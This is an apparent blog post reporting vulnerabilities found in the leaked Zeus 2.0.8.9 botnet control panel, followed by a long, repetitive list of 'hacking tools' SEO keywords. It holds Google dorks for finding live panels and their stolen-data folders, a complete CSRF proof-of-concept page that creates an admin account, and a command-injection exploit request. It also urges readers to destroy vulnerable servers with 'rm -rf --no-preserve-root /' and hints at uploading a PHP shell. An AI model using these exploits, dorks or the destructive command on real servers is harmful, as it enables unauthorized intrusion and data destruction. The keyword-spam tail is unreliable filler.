I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)
The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.
First things first, here are some Google dorks to find Zeus C&C server panel related stuff:
- inurl:cp.php?m=login - this should be the login to the control panel
- inurl:_reports/files - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
- inurl:install/index.php - this should be deleted, but I think this is useless now.
Boring vulns found
- Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
- No password policy - admins can set up really weak passwords
- No anti brute-force - you can try to guess the admin's password. Default username is admin
- Password autocomplete enabled - boring
- Missing HttpOnly flag on session cookie - it could be nice if I could find any XSS. I need more time to find one!
- No CSRF protection - except on the password change, where the old password is needed :-( boring
<html> <head> <title></title> </head> <body> <pre> This is a CSRF POC to create a new admin user in Zeus admin panels. Username: user_1392719246 Password: admin1 You might change the URL from 127.0.0.1. Redirecting in a hidden iframe in <span id="countdown">10</span> seconds. </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe> <form action="http://127.0.0.1/cp.php?m=sys_users&new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame"> <input name="name" type="hidden" value="user_1392719246" /> <input name="password" type="hidden" value="admin1" /> <input name="status" type="hidden" value="1" /> <input name="comment" type="hidden" value="PWND!" /> <input name="r_botnet_bots" type="hidden" value="1" /> <input name="r_botnet_scripts" type="hidden" value="1" /> <input name="r_botnet_scripts_edit" type="hidden" value="1" /> <input name="r_edit_bots" type="hidden" value="1" /> <input name="r_reports_db" type="hidden" value="1" /> <input name="r_reports_db_edit" type="hidden" value="1" /> <input name="r_reports_files" type="hidden" value="1" /> <input name="r_reports_files_edit" type="hidden" value="1" /> <input name="r_reports_jn" type="hidden" value="1" /> <input name="r_stats_main" type="hidden" value="1" /> <input name="r_stats_main_reset" type="hidden" value="1" /> <input name="r_stats_os" type="hidden" value="1" /> <input name="r_system_info" type="hidden" value="1" /> <input name="r_system_options" type="hidden" value="1" /> <input name="r_system_user" type="hidden" value="1" /> <input name="r_system_users" type="hidden" value="1" /> </form> <script type="text/javascript"> window.onload=function(){ var counter = 10; var interval = setInterval(function() { counter--; document.getElementById('countdown').innerHTML = counter; if (counter == 0) { redirect(); clearInterval(interval); } }, 1000); }; function redirect() { document.getElementById("csrf-form").submit(); } </script> </body> </html> - MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
- ClickJacking - really boring stuff
- Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
- SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.
Whats good news (for the C&C panel owners)
The following stuff looks good, at least some vulns were taken seriously:
- The system directory is protected with .htaccess deny from all.
- gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
- Anti XSS: the following code is used almost everywhere
return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8'); My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda. What's really bad news (for the C&C panel owners)
And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).
The vulnerable code is in system/fsarc.php:
function fsarcCreate($archive, $files){ ... $archive .= '.zip'; $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"'; exec($cli, $e, $r); } The exploit could not be simpler:
POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60 filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.
Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)
That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )
Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)
- Hack Website Online Tool
- Hack Tool Apk No Root
- Pentest Tools Online
- Hacking Tools Free Download
- Hacking Tools And Software
- Hacker Tools For Windows
- Pentest Tools For Android
- Best Hacking Tools 2020
- Hacker Tools Windows
- Best Pentesting Tools 2018
- Usb Pentest Tools
- Pentest Tools Android
- Bluetooth Hacking Tools Kali
- Hack Tools For Windows
- Ethical Hacker Tools
- Pentest Tools Website Vulnerability
- Pentest Tools Download
- Hacker Tools 2019
- Hack Apps
- Hacker Tools Free
- Pentest Reporting Tools
- Hacker Tools For Windows
- Pentest Tools Tcp Port Scanner
- Pentest Tools Free
- Pentest Automation Tools
- Black Hat Hacker Tools
- Hack Tools For Games
- Pentest Tools For Windows
- Pentest Tools Framework
- Hacker Tools Free
- Hacking Tools Windows 10
- Hacking Tools Windows
- Hacking Tools For Games
- Hack Tools Pc
- Pentest Tools Free
- Hack Tools For Ubuntu
- World No 1 Hacker Software
- Hacking Tools 2019
- World No 1 Hacker Software
- Usb Pentest Tools
- How To Hack
- Hack Tools For Windows
- Hacker Tools Free
- Hacker Search Tools
- Pentest Tools Open Source
- What Are Hacking Tools
- Pentest Tools Alternative
- Easy Hack Tools
- What Are Hacking Tools
- Nsa Hack Tools
- Hack Tools
- Hacking Tools Pc
- Pentest Tools Download
- How To Install Pentest Tools In Ubuntu
- Hacker Tools Linux
- Hacker Tools Apk Download
- Pentest Tools Apk
- Hacker Tools 2020
- Pentest Tools Review
- Hacking Tools Free Download
- Pentest Tools For Mac
- Hack Tools Mac
- Hacker Tools Windows
- Hacking Tools Download
- Pentest Tools Subdomain
- Hacker Hardware Tools
- Hack Tools
- Hack Tools For Games
- What Are Hacking Tools
- Hacker Tools List
- Hacking Tools Mac
- Pentest Tools Url Fuzzer
- Hacking Tools
- Physical Pentest Tools
- Hacking Tools Mac
- Hacking Tools
- Black Hat Hacker Tools
- Hacking Tools For Pc
- What Is Hacking Tools
- Pentest Tools Port Scanner
- Pentest Tools Android
- Pentest Recon Tools
- How To Hack
- Hacker Tools
- Pentest Tools For Ubuntu
- Hacking Tools For Pc
- Hacking Apps
- Hack Tool Apk
- Install Pentest Tools Ubuntu
- Hacking Tools Online
- Pentest Tools
- Pentest Tools Alternative
- Install Pentest Tools Ubuntu
- Pentest Tools Android
- Game Hacking
- Hack Tools Mac
- Easy Hack Tools
- Pentest Tools Subdomain
- Hacking Tools 2019
- Pentest Tools Download
- Hack Tool Apk No Root
- Pentest Tools Windows
- Pentest Tools Framework
- Best Hacking Tools 2019
- Physical Pentest Tools
- Pentest Tools
- Hacker Tools Free
- Hacker Tools For Windows
- Hack App
- How To Hack
- Pentest Tools For Windows
- Hacker Tools For Mac
- Hack Tools
- Hack Tool Apk
- Hacker Tool Kit
- Android Hack Tools Github
- Pentest Tools Port Scanner
- Pentest Tools For Android
- Hackrf Tools
- Hacking Tools For Beginners
- Hack Tool Apk
- Hack App
- Physical Pentest Tools
- Hacking Tools Pc
- Hack Tools For Windows
- Pentest Tools Website
- Hacker Tools Windows
- Hacking Tools Mac
- Hacker Tools For Ios
- How To Make Hacking Tools
- Usb Pentest Tools
- Pentest Tools Website
- Pentest Tools List
- Hacking Tools And Software
- How To Make Hacking Tools
- Hacking Tools Download
- Pentest Tools Free
- Hacking App
- Hack Tools Pc
- How To Install Pentest Tools In Ubuntu
- Pentest Tools Url Fuzzer
- Hacking Tools Software
- Hack Tools 2019
- Hack Tools Pc
- Underground Hacker Sites
- What Are Hacking Tools
- World No 1 Hacker Software
- Pentest Tools Find Subdomains
- Hacker Tools List
- Hacking Tools For Windows Free Download
- Hack Tools Github
- Hacker Tools Linux
- Hacker Tools Software
- Hacker Security Tools
- Kik Hack Tools
- Pentest Tools Kali Linux
- Top Pentest Tools
- Growth Hacker Tools
- Best Pentesting Tools 2018
- Best Pentesting Tools 2018
- Hacking Tools For Windows Free Download
- Hacker Tools For Windows
- Hack Tool Apk
- Hacking Tools
- Pentest Automation Tools
- Hack Tools For Pc
- Github Hacking Tools
- Hack Tools Github
- Tools For Hacker
- Best Hacking Tools 2019
No comments:
Post a Comment